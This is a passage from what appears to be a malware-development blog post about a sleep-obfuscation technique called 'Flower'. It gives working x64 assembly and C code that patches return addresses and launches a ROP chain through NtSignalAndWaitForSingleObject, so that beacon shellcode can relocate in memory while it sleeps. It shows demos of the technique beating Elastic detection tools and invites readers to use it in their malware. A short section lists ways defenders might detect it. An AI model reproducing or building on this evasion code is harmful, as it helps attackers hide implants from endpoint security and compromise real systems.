;; rebase return address of calling function
;; no need to be inlined in [-Os] since we JMP to it
;; (no CALL => no new frame => no new retaddr)
;;
;; will require [-fno-omit-frame-pointer] as we need RBP (frame ptr)
;; to get the return address, the compiler in [-Os] seems to
;; prefer [ rsp + COMPILE_TIME_OFFSET ], which is not
;; function agnostic
;;
;; FwPatchRetAddr( ImgBase* [rcx], NewBase* [rdx] )
FwPatchRetAddr:
mov r8, [ rbp + 8 ]
sub r8, rcx
add r8, rdx
mov [ rbp + 8 ], r8
ret
|
- We get our return address ([rbp+8])
- We substract our image base
- We add our new base (address of the region we’re flowing into)
- We move the rebased return address back to where it was
- NOTE: if this function is CALL’d instead of JMP’d to or inlined it won’t really work.
I then use it to return to the caller of Flower without crashing.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
LEAVE:
//
// we only want to rebase our return address
// if a Fw*Obf function failed, meaning we didn't
// move
//
if ( ! NT_SUCCESS( Status ) ) {
//
// sleep with KUSER_SHARED_DATA so even if we failed
// we can ensure that we delayed execution
// (obv not good nor ideal but could still be important)
//
FwSharedSleep( Delay );
} else FwPatchRetAddr( Ctx.ShcBase, Ctx.NxtBuf );
|
We need to apply the same idea to NtSignalAndWaitForSingleObject because by the time we’re done waiting for the end object, it’s return address points to the old, and now freed, memory region.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
|
;; wrapper around [NtSignalAndWaitForSingleObject] to patch our retaddr
;; then JMP to the actual function in NTDLL to queue our CONTEXT based ropchain
;;
;; this is done because after queuing our ropchain, the shellcode
;; will have moved elsewhere in memory, thus if [NtSignalAndWaitForSingleObject]
;; was called directly, it would return to the old, now freed, memory (=> CRASH)
;;
;; FwCtxRopStart( FLOWER_ROPSTART_PRM* [rcx] )
FwRopStart:
;; save our return address in a volatile register
pop r10
push r12
;; setup function args from struct
mov r12, rcx
mov r11, [ r12 ] ; Rcx->Func
mov rcx, [ r12 + 0x8 ] ; Rcx->Signal
mov rdx, [ r12 + 0x10 ] ; Rcx->Wait
mov r8, [ r12 + 0x18 ] ; Rcx->Alertable
mov r9, [ r12 + 0x20 ] ; Rcx->Timeout
;; calculate new return address
sub r10, [ r12 + 0x28 ] ; Rcx->ImgBase
add r10, [ r12 + 0x30 ] ; Rcx->NewBase
pop r12
;; patch return address of the current frame
push r10
;; JMP to NtSignalAndWaitForSingleObject
;;
;; we JMP to it instead of CALL'ing it to not generate a
;; new frame so we can patch the retaddr of NtSignalAndWaitForSingleObject
jmp r11 ; Rcx->Func
;; no ret since NtSignalAndWaitForSingleObject
;; will do it for us.
|
For easier usage we pass a struct holding our relevant parameters for the function
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
|
//
// FwRopStart wrapper struct
// idk what type safety is
//
typedef struct _FLOWER_ROPSTART {
//
// NtSignalAndWaitForSingleObject + args
//
PVOID Func;
PVOID Signal;
PVOID Wait;
PVOID Alertable;
PVOID TimeOut;
//
// retaddr patching
//
PVOID ImgBase;
PVOID NewBase;
} FLOWER_ROPSTART_PRM, *PFLOWER_ROPSTART_PRM;
|
And to craft said parameter struct I made a helper function to make the usage even easier.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
|
FUNC NTSTATUS FwRopstartPrm(
_In_ PFLOWER_CTX Ctx,
_Out_ PFLOWER_ROPSTART_PRM Prm,
_In_ HANDLE Event,
_In_ HANDLE Wait,
_In_ PVOID OldBase,
_In_ PVOID NxtBase
) {
if ( ! Ctx || ! Prm ) {
return STATUS_UNSUCCESSFUL;
}
//
// NtSignalAndWaitForSingleObject args
//
Prm->Func = Ctx->Win32.NtSignalAndWaitForSingleObject;
Prm->Signal = Event;
Prm->Wait = Wait;
Prm->Alertable = FALSE;
Prm->TimeOut = NULL;
//
// rebasing info
//
Prm->ImgBase = OldBase;
Prm->NewBase = NxtBase;
return STATUS_SUCCESS;
}
|
We then use FwRopStart in place of NtSignalAndWaitForSingleObject and it won’t return in the old memory :)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
|
FLOWER_ROPSTART_PRM RopPrm = { 0 }
//
// ensure struct is zero'd
//
MmZero( &RopPrm, sizeof( FLOWER_ROPSTART_PRM ) );
[ ... ]
//
// prepare wrapper struct for NtSignalAndWaitForSingleObject
//
if ( ! NT_SUCCESS( Status = FwRopstartPrm( Ctx, &RopPrm, Ctx->Evnts.Start, Thread, Ctx->ShcBase, Ctx->NxtBuf ) ) ) {
PRINTF( "[FLOWER] [-] Failed to prepare FLOWER_ROPSTART_PRM struct [Status: 0x%lx]\n", Status );
goto LEAVE;
}
//
// signal the ropchain to start and wait for the thread to be done
//
FwRopStart( RopPrm );
|
And that’s pretty much it, do know that this assumes the beacon is fully PIC, if you’re using a RDLL you might need to remap every section which is possible but a bit annoying I guess.
You can chain this with other stuff, which is the funny thing about sleep obfuscation, I recommend you check out https://dtsec.us/2023-04-24-Sleep/ if HSB is giving you nightmares, out of scope for this post however.
Either ways, may your malware get jiggy with it now.
demo
below you can find recordings of this technique against CFG-FindHiddenShellcode and EtwTi-FluctuationMonitor (fyi, my vm is kinda slow, I dont know if it was ever shut down)
sillyware vs ELASTIC: round 1
in action against CFG-FindHiddenShellcode
sillyware vs ELASTIC: round 2
in action against EtwTi-FluctuationMonitor
2-0
caveats
The first caveat would be how you write the code obviously, the more nested your sleep obfuscation routine is (compared to the main function) in your code the more return addresses you’ll have to patch so you don’t jump back into the old location. Not really a big caveat however I thought I would mention this.
The second is more on the practical level: it would be way better for the beacon to be fully PIC and not a RDLL due to the fact that the former will only require to be moved into another RX region whereas a RDLL will basically require to be remapped, this in turn being louder and having a high overhead. U2U as always however.
Also whilst trying to use FOLIAGE through fibers, I, at this time, cannot seem to be able to get it to work, without fibers it works fine however. 5pider told me that Austin was using fibers due to the high stack usage of the cobalt strike beacon, so fibers in our case don’t seem to be relevant when it comes to stealth.
Silly oversight or just limitation ? At this time I am unsure (not like it matters lol)
going beyond
In the realm of in memory evasion, there are many more things to research and this was only one of them. In and off itself this technique still has some flaws whether it’s because I lazily decided to use techniques like EKKO to showcase it or because the behavior is still a bit different from actual JIT. I hope this adds to the table, considering “malware development” is in current times, an overwritten topic.
Austin Hudson (ilove2pwn) made a tweet when it came to CFG-FindHiddenShellcode so I thought I would link it here because even though im doubting it would get around EtwTi-FluctuationMonitor it most certainly would against CFG-FindHiddenShellcode
JIT seems to become more and more the pet peeve of detections such as stack tracing or just memory scanning in general. This shows that it’s something worth elaborating on for both attackers and defenders alike.
detections
There are lots of detection ground on this technique, first of the usage of FOLIAGE/EKKO/ZILEAN to queue the modified ropchain is in itself a bit weird. As far as I know I think ELASTIC is able to detect APCs trying to run NtContinue to indirectly call the necessary functions. Timers being blocking is also something suspicious, which HSB leverages as an IOC. In upcoming times I plan on releasing a version of flower that does not rely on such techniques thus circumventing the need of NtContinue etc.
In itself the following things are possible to detect:
- Abnormal delay between RW then RX, addressable by adding an additional step to sleep in RX instead
- CONTEXT structure pointing to RtlMoveMemory/RtlCopyMemory or literally anything that writes memory from one buffer to another
- CONTEXT structure pointing to NtFreeVirtualMemory
That is where the third presented POC actually becomes interesting, by constructing normal process behavior profiles it would be possible to find the nuance between this and actual JIT.
I have been working on a modulable and more modern usermode memory scanner that tries to hunt for IOCs that aren’t hunted for yet (atleast to my knowledge) blogpost about this soon enough aswell.
le funny
Sleep obfuscation is certainly cool but an easy win is still chilling in a .NET RWX region (“mockingjay” or bring your own RWX section clowns in shambles) as you aren’t stomping anything (no easily spottable discrepancies between the module in memory and on disk), it’s still legit and it’s RWX, great success.
.NET JIT is honestly a very interesting subject, I recommend you check out this blogpost by XPN: https://blog.xpnsec.com/weird-ways-to-execute-dotnet/ and this gist by dylan https://gist.github.com/susMdT/2d13330f6a5bfa482555e22430c0eb82
acknowledgments
I would like to thank first Dylan Tran (dtsec.us) for being an awesome friend, we discussed this idea a while back and he was the first one to try it. He was also the one to proofread my suboptimal english; do give his work a read, as it inspired me and I hope will inspire others aswell.
I would also like to thank ELASTIC for sharing a lot of their detections with the public, I believe this should be standard behavior for every vendor but here we are with most of those vendors being borderline scammers.
(In no special order)
Thank you for reading :)